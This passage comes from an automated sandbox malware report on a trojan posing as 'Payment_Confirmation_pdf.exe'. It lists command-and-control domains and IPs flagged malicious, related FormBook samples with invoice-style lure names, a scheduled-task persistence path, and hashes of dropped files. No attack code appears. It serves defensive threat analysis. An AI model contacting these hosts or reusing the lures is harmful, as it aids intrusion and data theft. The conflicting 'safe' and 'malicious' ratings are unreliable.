                      http://www.sankan-fukushi.info/aayz/0%Avira URL Cloudsafe
                      http://batit.aliyun.com/alww.html?id=000000000042522066810%Avira URL Cloudsafe
                      http://www.madhf.tech/1bkl/?d0s=UY22ibAHSKCKJ9FjPBVzD0%Avira URL Cloudsafe
                      https://support.lolipop.jp/hc/ja/articles/3600491329530%Avira URL Cloudsafe
                      http://www.buckser.info/xzte/0%Avira URL Cloudsafe
                      http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif0%Avira URL Cloudsafe
                      http://www.innovateideas.xyz/4wqa/0%Avira URL Cloudsafe
                      https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=4040%Avira URL Cloudsafe
                      https://pepabo.com/0%Avira URL Cloudsafe
                      http://www.zxyck.net/yp7g/0%Avira URL Cloudsafe
                      http://www.innovateideas.xyz0%Avira URL Cloudsafe
                      https://static.minne.com/files/banner/minne_600x5000%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      www.madhf.tech
                      103.224.182.242
                      truefalse
                        high
                        www.zxyck.net
                        118.107.250.103
                        truetrue
                          unknown
                          www.buckser.info
                          120.26.240.121
                          truetrueunknown
                          www.innovateideas.xyz
                          209.74.77.108
                          truetrue
                            unknown
                            www.sankan-fukushi.info
                            163.44.185.183
                            truefalse
                              high
                              www.egldfi.xyz
                              unknown
                              unknowntrue
                                unknown
                                NameMaliciousAntivirus DetectionReputation
                                http://www.sankan-fukushi.info/aayz/true
                                • Avira URL Cloud: safe
                                unknown
                                http://www.innovateideas.xyz/4wqa/true
                                • Avira URL Cloud: safe
                                unknown
                                http://www.buckser.info/xzte/true
                                • Avira URL Cloud: safe
                                unknown
                                http://www.zxyck.net/yp7g/true
                                • Avira URL Cloud: safe
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                https://duckduckgo.com/chrome_newtabsdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://support.lolipop.jp/hc/ja/articles/360049132953sdiagnhost.exe, 00000013.00000002.2566048825.000000000564A000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://vimeo.com/api/v2/video/Payment_Confirmation_pdf.exe, cQwRvD.exe.0.drfalse
                                    high
                                    https://duckduckgo.com/ac/?q=sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      http://tempuri.org/_prof_basesDataSet.xsdPayment_Confirmation_pdf.exe, cQwRvD.exe.0.drfalse
                                        high
                                        http://vimeo.com/api/v2/channel/=http://vimeo.com/api/v2/group/Payment_Confirmation_pdf.exe, cQwRvD.exe.0.drfalse
                                          high
                                          http://www.madhf.tech/1bkl/?d0s=UY22ibAHSKCKJ9FjPBVzDfirefox.exe, 00000016.00000002.1959082934.0000000027734000.00000004.80000000.00040000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://vimeo.com/api/v2/album/Payment_Confirmation_pdf.exe, cQwRvD.exe.0.drfalse
                                            high
                                            http://batit.aliyun.com/alww.html?id=00000000004252206681sdiagnhost.exe, 00000013.00000002.2566048825.00000000057DC000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003EEC000.00000004.00000001.00040000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://tempuri.org/_prof_basesDataSet1.xsdEcom.vimeo.api.Properties.ResourcesPayment_Confirmation_pdf.exe, cQwRvD.exe.0.drfalse
                                              high
                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                high
                                                https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404sdiagnhost.exe, 00000013.00000002.2566048825.000000000564A000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://vimeo.com/api/v2/Payment_Confirmation_pdf.exe, cQwRvD.exe.0.drfalse
                                                  high
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gifsdiagnhost.exe, 00000013.00000002.2566048825.000000000564A000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://vimeo.com/api/v2/activity/Payment_Confirmation_pdf.exe, cQwRvD.exe.0.drfalse
                                                      high
                                                      https://lolipop.jp/sdiagnhost.exe, 00000013.00000002.2566048825.000000000564A000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        high
                                                        https://www.ecosia.org/newtab/sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          https://www.chiark.greenend.org.uk/~sgtatham/putty/0Payment_Confirmation_pdf.exe, cQwRvD.exe.0.drfalse
                                                            high
                                                            https://pepabo.com/sdiagnhost.exe, 00000013.00000002.2566048825.000000000564A000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://ac.ecosia.org/autocomplete?q=sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.innovateideas.xyzmYtMtAAMpAtCOL.exe, 00000014.00000002.2567539017.000000000594C000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                http://js.ad-stir.com/js/adstir.js?20130527sdiagnhost.exe, 00000013.00000002.2566048825.000000000564A000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namePayment_Confirmation_pdf.exe, 00000000.00000002.1426301513.0000000003155000.00000004.00000800.00020000.00000000.sdmp, cQwRvD.exe, 0000000B.00000002.1591356041.00000000031B0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=sdiagnhost.exe, 00000013.00000002.2568400764.000000000776E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://static.minne.com/files/banner/minne_600x500sdiagnhost.exe, 00000013.00000002.2566048825.000000000564A000.00000004.10000000.00040000.00000000.sdmp, mYtMtAAMpAtCOL.exe, 00000014.00000002.2564859615.0000000003D5A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs
                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      209.74.77.108
                                                                      www.innovateideas.xyzUnited States
                                                                      31744MULTIBAND-NEWHOPEUStrue
                                                                      163.44.185.183
                                                                      www.sankan-fukushi.infoJapan7506INTERQGMOInternetIncJPfalse
                                                                      103.224.182.242
                                                                      www.madhf.techAustralia
                                                                      133618TRELLIAN-AS-APTrellianPtyLimitedAUfalse
                                                                      118.107.250.103
                                                                      www.zxyck.netHong Kong
                                                                      24321OCENET-AS-APOCESdnBhdISPMYtrue
                                                                      120.26.240.121
                                                                      www.buckser.infoChina
                                                                      37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdtrue
                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1563622
                                                                      Start date and time:2024-11-27 08:53:11 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 9m 32s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:default.jbs
                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                      Number of analysed new started processes analysed:24
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:2
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:Payment_Confirmation_pdf.exe
                                                                      Detection:MAL
                                                                      Classification:mal100.troj.spyw.evad.winEXE@25/16@9/5
                                                                      EGA Information:
                                                                      • Successful, ratio: 100%
                                                                      HCA Information:
                                                                      • Successful, ratio: 98%
                                                                      • Number of executed functions: 205
                                                                      • Number of non-executed functions: 276
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .exe
                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      TimeTypeDescription
                                                                      02:54:13API Interceptor1x Sleep call for process: Payment_Confirmation_pdf.exe modified
                                                                      02:54:20API Interceptor43x Sleep call for process: powershell.exe modified
                                                                      02:54:25API Interceptor1x Sleep call for process: cQwRvD.exe modified
                                                                      04:40:21API Interceptor1583777x Sleep call for process: sdiagnhost.exe modified
                                                                      08:54:23Task SchedulerRun new task: cQwRvD path: C:\Users\user\AppData\Roaming\cQwRvD.exe
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      209.74.77.108IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • www.urbanfashion.website/aezw/
                                                                      VSP469620.exeGet hashmaliciousFormBookBrowse
                                                                      • www.urbanxplore.info/chlo/?9HaD=WJ8Pjkl58Iqvi8v+346A7W2JCurCP35uavULUkOWxAdWurHwpVHOzp+Wq3EHGCpSI2RFmnu5nAtTba/o9p0CIyXXw9XhC0V5AfBtSRheiGahxikEfA==&wdv4=1RD4
                                                                      CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                      • www.mindfulmo.life/grm8/
                                                                      Mandatory Notice for all December Leave and Vacation application.exeGet hashmaliciousFormBookBrowse
                                                                      • www.hobbihub.info/i5gf/
                                                                      CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                      • www.mindfulmo.life/grm8/
                                                                      163.44.185.183DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • www.sankan-fukushi.info/qq1e/
                                                                      IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • www.sankan-fukushi.info/9k5s/
                                                                      SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                      • www.sankan-fukushi.info/21k5/
                                                                      Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                      • www.sankan-fukushi.info/p9qy/
                                                                      order I 018629.xlsxGet hashmaliciousFormBookBrowse
                                                                      • www.hihoha-menu.com/g24i/?Ij=C5lZ/tNmDIazGhz+mgSCdtEua581lzsfl6vwo2v3mqTQwnv5rjnUBpQzMVK0NvbkQlVLQw==&0f=e0DHTPtxAZK
                                                                      103.224.182.242PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                      • www.madhf.tech/3iym/
                                                                      Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                      • www.madhf.tech/6ou6/
                                                                      Payroll List.exeGet hashmaliciousFormBookBrowse
                                                                      • www.klohk.tech/3m3e/
                                                                      Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                      • www.madhf.tech/0mwe/
                                                                      DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                      • www.seeseye.website/37ym/?KV=8/t/mdNf2RQMOaNBNJ0C2CHQCZtSfGEsPKxsb92U4gy0IzojrjG5dpGxrabMefB+TiCWCE+I+OwKVMkti2s7d6J9YJjeD9jGibmgDAwgawFnRnPmUcSsGcI=&Wno=a0qDq
                                                                      SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                      • www.madhf.tech/vpqb/
                                                                      PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                      • www.klohk.tech/3m3e/
                                                                      Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                      • www.madhf.tech/p31e/
                                                                      http://perpetualsnob.comGet hashmaliciousUnknownBrowse
                                                                      • perpetualsnob.com/?fp=a3db7cd464228025d120ca597c81b5f2
                                                                      Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                      • www.klohk.tech/3m3e/
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      www.zxyck.netDO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • 118.107.250.103
                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                      • 118.107.250.103
                                                                      www.madhf.techPAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                      • 103.224.182.242
                                                                      Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                      • 103.224.182.242
                                                                      Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                      • 103.224.182.242
                                                                      SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                      • 103.224.182.242
                                                                      Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                      • 103.224.182.242
                                                                      www.sankan-fukushi.infoDO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • 163.44.185.183
                                                                      IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • 163.44.185.183
                                                                      SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                      • 163.44.185.183
                                                                      Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                      • 163.44.185.183
                                                                      www.buckser.infoPayment-251124.exeGet hashmaliciousFormBookBrowse
                                                                      • 114.55.89.54
                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      TRELLIAN-AS-APTrellianPtyLimitedAUkkEzK284oT.exeGet hashmaliciousHTMLPhisherBrowse
                                                                      • 103.224.182.206
                                                                      http://begantotireo.xyzGet hashmaliciousUnknownBrowse
                                                                      • 103.224.212.217
                                                                      http://begantotireo.xyzGet hashmaliciousUnknownBrowse
                                                                      • 103.224.212.217
                                                                      PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                      • 103.224.182.242
                                                                      Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                      • 103.224.182.242
                                                                      Payroll List.exeGet hashmaliciousFormBookBrowse
                                                                      • 103.224.182.242
                                                                      Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeGet hashmaliciousFormBookBrowse
                                                                      • 103.224.182.242
                                                                      DOC_114542366.vbeGet hashmaliciousFormBookBrowse
                                                                      • 103.224.182.242
                                                                      SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                      • 103.224.182.242
                                                                      PROFORMA INVOICE.exeGet hashmaliciousFormBookBrowse
                                                                      • 103.224.182.242
                                                                      OCENET-AS-APOCESdnBhdISPMYDO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • 118.107.250.103
                                                                      A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                      • 118.107.250.103
                                                                      3NvALxFlHV.exeGet hashmaliciousFormBookBrowse
                                                                      • 202.87.223.248
                                                                      PO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                      • 202.87.223.248
                                                                      PO#071024.exeGet hashmaliciousFormBookBrowse
                                                                      • 202.87.223.248
                                                                      PO#001498.exeGet hashmaliciousFormBookBrowse
                                                                      • 202.87.223.248
                                                                      CENA.exeGet hashmaliciousFormBookBrowse
                                                                      • 202.87.223.248
                                                                      P030092024LANDWAY.exeGet hashmaliciousFormBookBrowse
                                                                      • 202.87.223.248
                                                                      https://srirakyat.i-ruma.com/RegisterNewResident?p=dbfe6cc3-1784-494c-b756-f53c8ffa4033Get hashmaliciousUnknownBrowse
                                                                      • 118.107.235.89
                                                                      ImVMtU7aeB.elfGet hashmaliciousMiraiBrowse
                                                                      • 118.107.193.237
                                                                      INTERQGMOInternetIncJPla.bot.sh4.elfGet hashmaliciousUnknownBrowse
                                                                      • 210.253.96.32
                                                                      DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • 163.44.185.183
                                                                      IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • 163.44.185.183
                                                                      SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                      • 163.44.185.183
                                                                      exe009.exeGet hashmaliciousEmotetBrowse
                                                                      • 157.7.164.178
                                                                      https://us-west-2.protection.sophos.com/?d=vercel.app&u=aHR0cHM6Ly93ZWJtYWlsLWF1dGgtc2VjLnZlcmNlbC5hcHA=&i=NWVjYjQ2MzZmNTgwNWIwZWJlZWZkM2Fl&t=UXZ3YkZpNSszWkdZNlBPdUNtNGVRQTM2ZzV1SmdscHZTN2E0TDhEQUVMYz0=&h=41cf60c27bc24f608fa5f6f60edfa437&s=AVNPUEhUT0NFTkNSWVBUSVYWbs5htFrsKfDZKi2vxyeN8JAV7eyBc8AqkmOaHaHVi8YGx5zRAzUm2TNYTJQ1rCs#Ymtqb29AaGRlbC5jby5rcg==Get hashmaliciousUnknownBrowse
                                                                      • 150.95.219.20
                                                                      Item-RQF-9456786.exeGet hashmaliciousUnknownBrowse
                                                                      • 163.44.185.183
                                                                      TT copy.exeGet hashmaliciousFormBookBrowse
                                                                      • 150.95.254.16
                                                                      botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                                      • 150.95.219.222
                                                                      spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                                      • 157.7.100.20
                                                                      MULTIBAND-NEWHOPEUSW3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • 209.74.77.109
                                                                      FACTURA 24V70 VINS.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.64.190
                                                                      DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • 209.74.77.109
                                                                      packing list G25469.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.64.59
                                                                      IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                      • 209.74.77.108
                                                                      PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.77.109
                                                                      file.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.77.109
                                                                      VSP469620.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.77.108
                                                                      CV_ Filipa Barbosa.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.77.108
                                                                      Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                      • 209.74.77.107
                                                                      No context
                                                                      No context
                                                                      Process:C:\Users\user\Desktop\Payment_Confirmation_pdf.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1730
                                                                      Entropy (8bit):5.35299682261553
                                                                      Encrypted:false
                                                                      SSDEEP:48:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HKHKMR5vzHKnHKU57Uy:Pq5qHwCYqh3oPtI6eqzxqqMR5rqnqU5t
                                                                      MD5:4D047149BCD6E4625565C631F1F723B2
                                                                      SHA1:33909516B8ACB42E0B7E5E7D48F8B2D917094BCB
                                                                      SHA-256:E84139F7D948F47ADF2E6346641261ADED096D1DB640EFF9B9B7D122121685DC
                                                                      SHA-512:AE0D2AC2C282AEBA1B63851529892240C3BE5D56F3996F1BEE3263FBB13A7A044348D63F04B0705836C5847994BD553F342511F6BB4DD075E4E8A3E9CB12D54F
                                                                      Malicious:true
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                      Process:C:\Users\user\AppData\Roaming\cQwRvD.exe
                                                                      File Type:ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1730
                                                                      Entropy (8bit):5.35299682261553
                                                                      Encrypted:false
                                                                      SSDEEP:48:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HKHKMR5vzHKnHKU57Uy:Pq5qHwCYqh3oPtI6eqzxqqMR5rqnqU5t
                                                                      MD5:4D047149BCD6E4625565C631F1F723B2
                                                                      SHA1:33909516B8ACB42E0B7E5E7D48F8B2D917094BCB
                                                                      SHA-256:E84139F7D948F47ADF2E6346641261ADED096D1DB640EFF9B9B7D122121685DC
                                                                      SHA-512:AE0D2AC2C282AEBA1B63851529892240C3BE5D56F3996F1BEE3263FBB13A7A044348D63F04B0705836C5847994BD553F342511F6BB4DD075E4E8A3E9CB12D54F
                                                                      Malicious:false
                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:data
                                                                      Category:dropped
                                                                      Size (bytes):2232
                                                                      Entropy (8bit):5.379460230152629
                                                                      Encrypted:false
                                                                      SSDEEP:48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZPUyjNs:fLHyIFKL3IZ2KRH9OugWNs
                                                                      MD5:5040BC0AA3939852C2FCC47A13FA166B
                                                                      SHA1:509CA0EC93DC9A43512694FFC398328207DC8339
                                                                      SHA-256:17C04186A1ADA525DA8F869BB03747D347F45888CCA863DE1941B9FC457361F4
                                                                      SHA-512:B9508550F9045948C54E39BDF40C2DB62A768568C9A89930DABF211E8B24851A8F7506ACBA37F4138F16DF0746A323C84ABDB4DDE7214336C93958918F3E944B
                                                                      Malicious:false
                                                                      Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                      Process:C:\Windows\SysWOW64\sdiagnhost.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                      Category:modified
                                                                      Size (bytes):196608
                                                                      Entropy (8bit):1.1215420383712111
                                                                      Encrypted:false
                                                                      SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                      MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                      SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                      SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                      SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
                                                                      Encrypted:false
                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                      Malicious:false
                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      File Type:ASCII text, with no line terminators
                                                                      Category:dropped
                                                                      Size (bytes):60
                                                                      Entropy (8bit):4.038920595031593
